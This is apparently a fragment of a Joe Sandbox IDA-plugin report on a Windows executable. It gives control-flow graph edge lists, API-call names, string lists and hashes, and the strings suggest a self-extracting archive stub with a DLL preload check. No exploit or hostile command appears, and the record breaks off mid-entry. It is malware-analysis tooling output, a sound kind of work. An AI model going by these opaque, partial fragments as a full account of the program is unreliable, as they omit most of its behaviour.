                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                    • String ID: __tmp_reference_source_
                                                                    • API String ID: 3668304517-685763994
                                                                    • Opcode ID: f7f8a9fe111d1445b296415a6db48cbccd10df9cc401444a39226eebe3790364
                                                                    • Instruction ID: e50b457e0fbeeada209427a28317bb2fac4eda0d8c87125832c3609722dfb0dc
                                                                    • Opcode Fuzzy Hash: f7f8a9fe111d1445b296415a6db48cbccd10df9cc401444a39226eebe3790364
                                                                    • Instruction Fuzzy Hash: 57D28662E087C1A6EB64AB65D0803FEE7A1FB45784FA04132DB9D03AA5CFBCE455D710
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                    • String ID: CMT
                                                                    • API String ID: 3668304517-2756464174
                                                                    • Opcode ID: 2415ac396bc376b709029b284e23b116a61fe08cc3dcee04032485c5ae55b9eb
                                                                    • Instruction ID: 237e4d0c3a14193679034b34f43759e582f0db5e4f8e3a3cff17ae8284be505b
                                                                    • Opcode Fuzzy Hash: 2415ac396bc376b709029b284e23b116a61fe08cc3dcee04032485c5ae55b9eb
                                                                    • Instruction Fuzzy Hash: 1FE20322F08682AAEB18EB35D4502FDA7A1FB45784FA04035DB5E43A96DFFCE455D320

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 3469 7ff731c8407c-7ff731c840b3 3470 7ff731c840b9-7ff731c840c1 3469->3470 3471 7ff731c84192-7ff731c8419f FindNextFileW 3469->3471 3472 7ff731c840c6-7ff731c840d8 FindFirstFileW 3470->3472 3473 7ff731c840c3 3470->3473 3474 7ff731c841b3-7ff731c841b6 3471->3474 3475 7ff731c841a1-7ff731c841b1 GetLastError 3471->3475 3472->3474 3476 7ff731c840de-7ff731c84106 call 7ff731c869cc 3472->3476 3473->3472 3478 7ff731c841b8-7ff731c841c0 3474->3478 3479 7ff731c841d1-7ff731c84213 call 7ff731ca78fc call 7ff731c7129c call 7ff731c88050 3474->3479 3477 7ff731c8418a-7ff731c8418d 3475->3477 3491 7ff731c84108-7ff731c84124 FindFirstFileW 3476->3491 3492 7ff731c84127-7ff731c84130 3476->3492 3481 7ff731c842ab-7ff731c842ce call 7ff731ca22a0 3477->3481 3483 7ff731c841c5-7ff731c841cc call 7ff731c720b0 3478->3483 3484 7ff731c841c2 3478->3484 3505 7ff731c8424c-7ff731c842a6 call 7ff731c8f0e8 * 3 3479->3505 3506 7ff731c84215-7ff731c8422c 3479->3506 3483->3479 3484->3483 3491->3492 3493 7ff731c84169-7ff731c8416d 3492->3493 3494 7ff731c84132-7ff731c84149 3492->3494 3493->3474 3498 7ff731c8416f-7ff731c8417e GetLastError 3493->3498 3496 7ff731c8414b-7ff731c8415e 3494->3496 3497 7ff731c84164 call 7ff731ca218c 3494->3497 3496->3497 3500 7ff731c842d5-7ff731c842db call 7ff731ca7884 3496->3500 3497->3493 3502 7ff731c84188 3498->3502 3503 7ff731c84180-7ff731c84186 3498->3503 3502->3477 3503->3477 3503->3502 3505->3481 3508 7ff731c8422e-7ff731c84241 3506->3508 3509 7ff731c84247 call 7ff731ca218c 3506->3509 3508->3509 3512 7ff731c842cf-7ff731c842d4 call 7ff731ca7884 3508->3512 3509->3505 3512->3500
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: FileFind$ErrorFirstLast_invalid_parameter_noinfo_noreturn$Next
                                                                    • String ID:
                                                                    • API String ID: 474548282-0
                                                                    • Opcode ID: 083738887a80dfdd435d0b3a7adacdcf0c3f6e619cdef7a444a6c352ce5ad5db
                                                                    • Instruction ID: eef7743791482c8fd0faa6995ee6fca839a47367f3f33195fd861730030ee915
                                                                    • Opcode Fuzzy Hash: 083738887a80dfdd435d0b3a7adacdcf0c3f6e619cdef7a444a6c352ce5ad5db
                                                                    • Instruction Fuzzy Hash: F961D762F08642A5DB10EF68E4803ADA361FB857B4FA04331EAAD43AD8DFBCD544D710

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 3580 7ff731c75e2c-7ff731c76129 call 7ff731c882fc call 7ff731c885b0 3586 7ff731c7612e-7ff731c76132 3580->3586 3587 7ff731c76134-7ff731c7613c call 7ff731c76fcc 3586->3587 3588 7ff731c76141-7ff731c76171 call 7ff731c88398 call 7ff731c88530 call 7ff731c884e8 3586->3588 3594 7ff731c7697b 3587->3594 3606 7ff731c76177-7ff731c76179 3588->3606 3607 7ff731c76973-7ff731c76976 call 7ff731c7466c 3588->3607 3596 7ff731c7697e-7ff731c76985 3594->3596 3597 7ff731c76987-7ff731c76998 3596->3597 3598 7ff731c769b4-7ff731c769e3 call 7ff731ca22a0 3596->3598 3600 7ff731c7699a-7ff731c769ad 3597->3600 3601 7ff731c769af call 7ff731ca218c 3597->3601 3600->3601 3604 7ff731c769e4-7ff731c769e9 call 7ff731ca7884 3600->3604 3601->3598 3615 7ff731c769ea-7ff731c769ef call 7ff731ca7884 3604->3615 3606->3607 3609 7ff731c7617f-7ff731c76189 3606->3609 3607->3594 3609->3607 3612 7ff731c7618f-7ff731c76192 3609->3612 3612->3607 3614 7ff731c76198-7ff731c761aa call 7ff731c885b0 3612->3614 3614->3587 3620 7ff731c761ac-7ff731c761fd call 7ff731c884b8 call 7ff731c884e8 * 2 3614->3620 3621 7ff731c769f0-7ff731c769f7 call 7ff731ca7884 3615->3621 3630 7ff731c7623f-7ff731c76249 3620->3630 3631 7ff731c761ff-7ff731c76222 call 7ff731c7466c call 7ff731c7ba1c 3620->3631 3633 7ff731c7624b-7ff731c76260 call 7ff731c884e8 3630->3633 3634 7ff731c76266-7ff731c76270 3630->3634 3631->3630 3648 7ff731c76224-7ff731c7622e call 7ff731c7433c 3631->3648 3633->3607 3633->3634 3637 7ff731c7627e-7ff731c76296 call 7ff731c7334c 3634->3637 3638 7ff731c76272-7ff731c7627b call 7ff731c884e8 3634->3638 3646 7ff731c76298-7ff731c7629b 3637->3646 3647 7ff731c762b3 3637->3647 3638->3637 3646->3647 3649 7ff731c7629d-7ff731c762b1 3646->3649 3650 7ff731c762b6-7ff731c762c8 3647->3650 3648->3630 3649->3647 3649->3650 3652 7ff731c762ce-7ff731c762d1 3650->3652 3653 7ff731c768b7-7ff731c76929 call 7ff731c84cc4 call 7ff731c884e8 3650->3653 3654 7ff731c762d7-7ff731c762da 3652->3654 3655 7ff731c76481-7ff731c764f4 call 7ff731c84c34 call 7ff731c884e8 * 2 3652->3655 3670 7ff731c7692b-7ff731c76934 call 7ff731c884e8 3653->3670 3671 7ff731c76936 3653->3671 3654->3655 3657 7ff731c762e0-7ff731c762e3 3654->3657 3687 7ff731c76507-7ff731c76533 call 7ff731c884e8 3655->3687 3688 7ff731c764f6-7ff731c76500 3655->3688 3660 7ff731c7632e-7ff731c76353 call 7ff731c884e8 3657->3660 3661 7ff731c762e5-7ff731c762e8 3657->3661 3674 7ff731c7639e-7ff731c763c5 call 7ff731c884e8 call 7ff731c88344 3660->3674 3675 7ff731c76355-7ff731c7638f call 7ff731c74228 call 7ff731c73c84 call 7ff731c7701c call 7ff731c71fa0 3660->3675 3666 7ff731c7696d-7ff731c76971 3661->3666 3667 7ff731c762ee-7ff731c76329 call 7ff731c884e8 3661->3667 3666->3596 3667->3666 3677 7ff731c76939-7ff731c76946 3670->3677 3671->3677 3699 7ff731c763c7-7ff731c76400 call 7ff731c74228 call 7ff731c73c84 call 7ff731c7701c call 7ff731c71fa0 3674->3699 3700 7ff731c76402-7ff731c7641f call 7ff731c88404 3674->3700 3727 7ff731c76390-7ff731c76399 call 7ff731c71fa0 3675->3727 3684 7ff731c7694c 3677->3684 3685 7ff731c76948-7ff731c7694a 3677->3685 3690 7ff731c7694f-7ff731c76959 3684->3690 3685->3684 3685->3690 3701 7ff731c76549-7ff731c76557 3687->3701 3702 7ff731c76535-7ff731c76544 call 7ff731c88398 call 7ff731c8f0b4 3687->3702 3688->3687 3690->3666 3694 7ff731c7695b-7ff731c76968 call 7ff731c74840 3690->3694 3694->3666 3699->3727 3716 7ff731c76475-7ff731c7647c 3700->3716 3717 7ff731c76421-7ff731c7646f call 7ff731c88404 * 2 call 7ff731c8c7bc call 7ff731ca49f0 3700->3717 3707 7ff731c76559-7ff731c7656c call 7ff731c88398 3701->3707 3708 7ff731c76572-7ff731c76595 call 7ff731c884e8 3701->3708 3702->3701 3707->3708 3723 7ff731c76597-7ff731c7659e 3708->3723 3724 7ff731c765a0-7ff731c765b0 3708->3724 3716->3666 3717->3716 3728 7ff731c765b3-7ff731c765eb call 7ff731c884e8 * 2 3723->3728 3724->3728 3727->3674 3744 7ff731c765ed-7ff731c765f4 3728->3744 3745 7ff731c765f6-7ff731c765fa 3728->3745 3747 7ff731c76603-7ff731c76632 3744->3747 3745->3747 3749 7ff731c765fc 3745->3749 3750 7ff731c76634-7ff731c76638 3747->3750 3751 7ff731c7663f 3747->3751 3749->3747 3750->3751 3752 7ff731c7663a-7ff731c7663d 3750->3752 3753 7ff731c76641-7ff731c76656 3751->3753 3752->3753 3754 7ff731c766ca 3753->3754 3755 7ff731c76658-7ff731c7665b 3753->3755 3757 7ff731c766d2-7ff731c76731 call 7ff731c73d00 call 7ff731c88404 call 7ff731c90cd4 3754->3757 3755->3754 3756 7ff731c7665d-7ff731c76683 3755->3756 3756->3757 3758 7ff731c76685-7ff731c766a9 3756->3758 3768 7ff731c76745-7ff731c76749 3757->3768 3769 7ff731c76733-7ff731c76740 call 7ff731c74840 3757->3769 3760 7ff731c766ab 3758->3760 3761 7ff731c766b2-7ff731c766bf 3758->3761 3760->3761 3761->3757 3763 7ff731c766c1-7ff731c766c8 3761->3763 3763->3757 3770 7ff731c7675b-7ff731c76772 call 7ff731ca78fc 3768->3770 3771 7ff731c7674b-7ff731c76756 call 7ff731c7473c 3768->3771 3769->3768 3778 7ff731c76777-7ff731c7677e 3770->3778 3779 7ff731c76774 3770->3779 3777 7ff731c76859-7ff731c76860 3771->3777 3780 7ff731c76873-7ff731c7687b 3777->3780 3781 7ff731c76862-7ff731c76872 call 7ff731c7433c 3777->3781 3782 7ff731c767a3-7ff731c767ba call 7ff731ca78fc 3778->3782 3783 7ff731c76780-7ff731c76783 3778->3783 3779->3778 3780->3666 3785 7ff731c76881-7ff731c76892 3780->3785 3781->3780 3794 7ff731c767bc 3782->3794 3795 7ff731c767bf-7ff731c767c6 3782->3795 3786 7ff731c7679c 3783->3786 3787 7ff731c76785 3783->3787 3790 7ff731c768ad-7ff731c768b2 call 7ff731ca218c 3785->3790 3791 7ff731c76894-7ff731c768a7 3785->3791 3786->3782 3792 7ff731c76788-7ff731c76791 3787->3792 3790->3666 3791->3621 3791->3790 3792->3782 3797 7ff731c76793-7ff731c7679a 3792->3797 3794->3795 3795->3777 3798 7ff731c767cc-7ff731c767cf 3795->3798 3797->3786 3797->3792 3800 7ff731c767e8-7ff731c767f0 3798->3800 3801 7ff731c767d1 3798->3801 3800->3777 3803 7ff731c767f2-7ff731c76826 call 7ff731c88320 call 7ff731c88558 call 7ff731c884e8 3800->3803 3802 7ff731c767d4-7ff731c767dd 3801->3802 3802->3777 3804 7ff731c767df-7ff731c767e6 3802->3804 3803->3777 3811 7ff731c76828-7ff731c76839 3803->3811 3804->3800 3804->3802 3812 7ff731c7683b-7ff731c7684e 3811->3812 3813 7ff731c76854 call 7ff731ca218c 3811->3813 3812->3615 3812->3813 3813->3777
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: CMT
                                                                    • API String ID: 0-2756464174
                                                                    • Opcode ID: a233297c88ebed2e631ec438d1cd10e1b0e3e5055da52990d200b0771bd9e9d4
                                                                    • Instruction ID: 2b5803c4f13d80cbb9a7f55dc16302a3e82f1d386fc93d50fd5ea78f68b6c1d9
                                                                    • Opcode Fuzzy Hash: a233297c88ebed2e631ec438d1cd10e1b0e3e5055da52990d200b0771bd9e9d4
                                                                    • Instruction Fuzzy Hash: A842E322F08682AAFB18EB74C1512FDB7A1FB51744FA00135DB5E53A96DFB8E518D320
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                    • String ID:
                                                                    • API String ID: 3340455307-0
                                                                    • Opcode ID: 17fec9accf37e8645c26856d3d4b9aa45065755fb291e857ccd25b31c37800ae
                                                                    • Instruction ID: 7e550885acc0f81905574fa68069bab386821fbdc923f862b33f4091238bff8a
                                                                    • Opcode Fuzzy Hash: 17fec9accf37e8645c26856d3d4b9aa45065755fb291e857ccd25b31c37800ae
                                                                    • Instruction Fuzzy Hash: 7B412722F1469296FB64EF21A9817BAA352FBC4784FA44034DE0E07F44DE7CE442D714

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 0 7ff731c8df4c-7ff731c8dfa0 call 7ff731ca23d0 GetModuleHandleW 3 7ff731c8dfa2-7ff731c8dfb5 GetProcAddress 0->3 4 7ff731c8dff7-7ff731c8e321 0->4 5 7ff731c8dfcf-7ff731c8dfe2 GetProcAddress 3->5 6 7ff731c8dfb7-7ff731c8dfc6 3->6 7 7ff731c8e47f-7ff731c8e49d call 7ff731c86414 call 7ff731c87db4 4->7 8 7ff731c8e327-7ff731c8e330 call 7ff731cab708 4->8 5->4 10 7ff731c8dfe4-7ff731c8dff4 5->10 6->5 20 7ff731c8e4a1-7ff731c8e4ab call 7ff731c85164 7->20 8->7 14 7ff731c8e336-7ff731c8e379 call 7ff731c86414 CreateFileW 8->14 10->4 21 7ff731c8e37f-7ff731c8e392 SetFilePointer 14->21 22 7ff731c8e46c-7ff731c8e47a CloseHandle call 7ff731c71fa0 14->22 28 7ff731c8e4e0-7ff731c8e528 call 7ff731ca78fc call 7ff731c7129c call 7ff731c88050 call 7ff731c71fa0 call 7ff731c8327c 20->28 29 7ff731c8e4ad-7ff731c8e4b8 call 7ff731c8dd04 20->29 21->22 24 7ff731c8e398-7ff731c8e3ba ReadFile 21->24 22->7 24->22 27 7ff731c8e3c0-7ff731c8e3ce 24->27 31 7ff731c8e3d4-7ff731c8e428 call 7ff731ca78fc call 7ff731c7129c 27->31 32 7ff731c8e77c-7ff731c8e783 call 7ff731ca25a4 27->32 71 7ff731c8e52d-7ff731c8e530 28->71 29->28 38 7ff731c8e4ba-7ff731c8e4de CompareStringW 29->38 50 7ff731c8e43f-7ff731c8e455 call 7ff731c8d05c 31->50 38->28 42 7ff731c8e539-7ff731c8e542 38->42 42->20 47 7ff731c8e548 42->47 48 7ff731c8e54d-7ff731c8e550 47->48 51 7ff731c8e552-7ff731c8e555 48->51 52 7ff731c8e5bb-7ff731c8e5be 48->52 60 7ff731c8e457-7ff731c8e467 call 7ff731c71fa0 * 2 50->60 61 7ff731c8e42a-7ff731c8e43a call 7ff731c8dd04 50->61 57 7ff731c8e559-7ff731c8e5a9 call 7ff731ca78fc call 7ff731c7129c call 7ff731c88050 call 7ff731c71fa0 call 7ff731c8327c 51->57 55 7ff731c8e5c4-7ff731c8e5d7 call 7ff731c87e70 call 7ff731c85164 52->55 56 7ff731c8e73e-7ff731c8e77b call 7ff731c71fa0 * 2 call 7ff731ca22a0 52->56 82 7ff731c8e682-7ff731c8e6cf call 7ff731c8da14 AllocConsole 55->82 83 7ff731c8e5dd-7ff731c8e67d call 7ff731c8dd04 * 2 call 7ff731c8aaa0 call 7ff731c8da14 call 7ff731c8aaa0 call 7ff731c8dba8 call 7ff731c9872c call 7ff731c719e0 55->83 108 7ff731c8e5b8 57->108 109 7ff731c8e5ab-7ff731c8e5b4 57->109 60->22 61->50 76 7ff731c8e532 71->76 77 7ff731c8e54a 71->77 76->42 77->48 94 7ff731c8e6d1-7ff731c8e726 GetCurrentProcessId AttachConsole call 7ff731c8e7e4 call 7ff731c8e7d4 GetStdHandle WriteConsoleW Sleep FreeConsole 82->94 95 7ff731c8e72c 82->95 97 7ff731c8e730-7ff731c8e737 call 7ff731c719e0 ExitProcess 83->97 94->95 95->97 108->52 109->57 112 7ff731c8e5b6 109->112 112->52
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturn$Console$FileHandle$AddressProcProcess$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadModulePointerReadSleepStringSystemVersionWrite
                                                                    • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$kernel32$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll
                                                                    • API String ID: 1496594111-2013832382
                                                                    • Opcode ID: 6c35d85a0d7de7c2ad60728f7b3f183caddfc68bafefe393af7a58770600f1ff
                                                                    • Instruction ID: b6dc659588824cbb6aebdf6018a68e141a3995b285aad9dde74ab8d5bc3b9783
                                                                    • Opcode Fuzzy Hash: 6c35d85a0d7de7c2ad60728f7b3f183caddfc68bafefe393af7a58770600f1ff
                                                                    • Instruction Fuzzy Hash: 0D324C31E09B82A9EB11EF64E8801E9B3A4FF45354FA04236DA4D47B65EFBCD254D360
                                                                    APIs
                                                                      • Part of subcall function 00007FF731C88E18: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF731C88F4D
                                                                    • _snwprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF731C89F35
                                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C8A3EF
                                                                    • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF731C8A3F5
                                                                      • Part of subcall function 00007FF731C90B3C: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF731C90AC4), ref: 00007FF731C90B69
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo_noreturn$ByteCharConcurrency::cancel_current_taskMultiWide_snwprintf
                                                                    • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
                                                                    • API String ID: 3629253777-3268106645
                                                                    • Opcode ID: 0fc393143a5d3e461d409afd558c662721dc80b2309836bcf9d462a656cf5c07
                                                                    • Instruction ID: 1357228eb527351b08f5e40cb3691b5ac44f55d0a7fb297adb0e2015920f90ee
                                                                    • Opcode Fuzzy Hash: 0fc393143a5d3e461d409afd558c662721dc80b2309836bcf9d462a656cf5c07
                                                                    • Instruction Fuzzy Hash: F262E222E19A82A5EB20EF64C4842BDE361FB44784FE05131DA4E47AD5EFBCE545E360

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1910 7ff731ca1880-7ff731ca1909 call 7ff731ca14d8 1913 7ff731ca1934-7ff731ca1951 1910->1913 1914 7ff731ca190b-7ff731ca192f call 7ff731ca17e8 RaiseException 1910->1914 1915 7ff731ca1953-7ff731ca1964 1913->1915 1916 7ff731ca1966-7ff731ca196a 1913->1916 1920 7ff731ca1b38-7ff731ca1b55 1914->1920 1919 7ff731ca196d-7ff731ca1979 1915->1919 1916->1919 1921 7ff731ca199a-7ff731ca199d 1919->1921 1922 7ff731ca197b-7ff731ca198d 1919->1922 1923 7ff731ca1a44-7ff731ca1a4b 1921->1923 1924 7ff731ca19a3-7ff731ca19a6 1921->1924 1930 7ff731ca1993 1922->1930 1931 7ff731ca1b09-7ff731ca1b13 1922->1931 1926 7ff731ca1a5f-7ff731ca1a62 1923->1926 1927 7ff731ca1a4d-7ff731ca1a5c 1923->1927 1928 7ff731ca19a8-7ff731ca19bb 1924->1928 1929 7ff731ca19bd-7ff731ca19d2 LoadLibraryExA 1924->1929 1932 7ff731ca1b05 1926->1932 1933 7ff731ca1a68-7ff731ca1a6c 1926->1933 1927->1926 1928->1929 1935 7ff731ca1a29-7ff731ca1a32 1928->1935 1934 7ff731ca19d4-7ff731ca19e7 GetLastError 1929->1934 1929->1935 1930->1921 1936 7ff731ca1b30 call 7ff731ca17e8 1931->1936 1937 7ff731ca1b15-7ff731ca1b26 1931->1937 1932->1931 1944 7ff731ca1a9b-7ff731ca1aae GetProcAddress 1933->1944 1945 7ff731ca1a6e-7ff731ca1a72 1933->1945 1938 7ff731ca19e9-7ff731ca19fc 1934->1938 1939 7ff731ca19fe-7ff731ca1a24 call 7ff731ca17e8 RaiseException 1934->1939 1940 7ff731ca1a34-7ff731ca1a37 FreeLibrary 1935->1940 1941 7ff731ca1a3d 1935->1941 1952 7ff731ca1b35 1936->1952 1937->1936 1938->1935 1938->1939 1939->1920 1940->1941 1941->1923 1944->1932 1949 7ff731ca1ab0-7ff731ca1ac3 GetLastError 1944->1949 1945->1944 1946 7ff731ca1a74-7ff731ca1a7f 1945->1946 1946->1944 1950 7ff731ca1a81-7ff731ca1a88 1946->1950 1954 7ff731ca1ac5-7ff731ca1ad8 1949->1954 1955 7ff731ca1ada-7ff731ca1b01 call 7ff731ca17e8 RaiseException call 7ff731ca14d8 1949->1955 1950->1944 1956 7ff731ca1a8a-7ff731ca1a8f 1950->1956 1952->1920 1954->1932 1954->1955 1955->1932 1956->1944 1958 7ff731ca1a91-7ff731ca1a99 1956->1958 1958->1932 1958->1944
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1694502009.00007FF731C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF731C70000, based on PE: true
                                                                    • Associated: 00000000.00000002.1694483643.00007FF731C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694586704.00007FF731CB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CCB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694612930.00007FF731CD4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1694685208.00007FF731CDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_7ff731c70000_5fr5gthkjdg71.jbxd
                                                                    Similarity
                                                                    • API ID: DloadSection$AccessExceptionProtectRaiseReleaseWrite$ErrorLastLibraryLoad
                                                                    • String ID: H
                                                                    • API String ID: 3432403771-2852464175
                                                                    • Opcode ID: c747dab0563719ebcac82db4dc8ab060d8be692e48dcdd0dd925af41b53a7671
                                                                    • Instruction ID: 781ccf2933909eda91fa10e2e1f409a3a8d66f6595ef09fcbcb8e6cdb2aff4eb
                                                                    • Opcode Fuzzy Hash: c747dab0563719ebcac82db4dc8ab060d8be692e48dcdd0dd925af41b53a7671
